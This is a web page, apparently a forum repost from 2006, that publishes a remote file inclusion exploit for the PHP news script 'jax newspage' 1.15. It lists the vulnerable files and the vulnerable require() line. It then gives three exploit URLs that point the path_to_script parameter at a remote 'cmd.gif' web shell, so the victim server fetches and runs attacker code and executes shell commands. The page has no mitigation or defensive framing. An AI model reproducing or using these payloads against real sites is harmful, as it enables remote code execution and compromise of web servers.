Home

news7 <= (news.php) Remote File Inclusion Exploit

Enviado por OeX el Do, 15/10/2006 - 18:56.
# BiyoSecurity.Org & SecurityWall.Org

# Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip

# Script Name : jax newspage

# Version : 1.15

# Risk : high

# Regard : RMx

# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP

# Vulnerable Files :

/admin/index.php

/admin/news.admin.php

/newsarchive.php

# Vulnerable code :

// Global variables
require ( $path_to_script."globals.inc.php");

# Exploit :

http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls

http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls

http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
  • 468 lecturas

Enviar un comentario nuevo

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.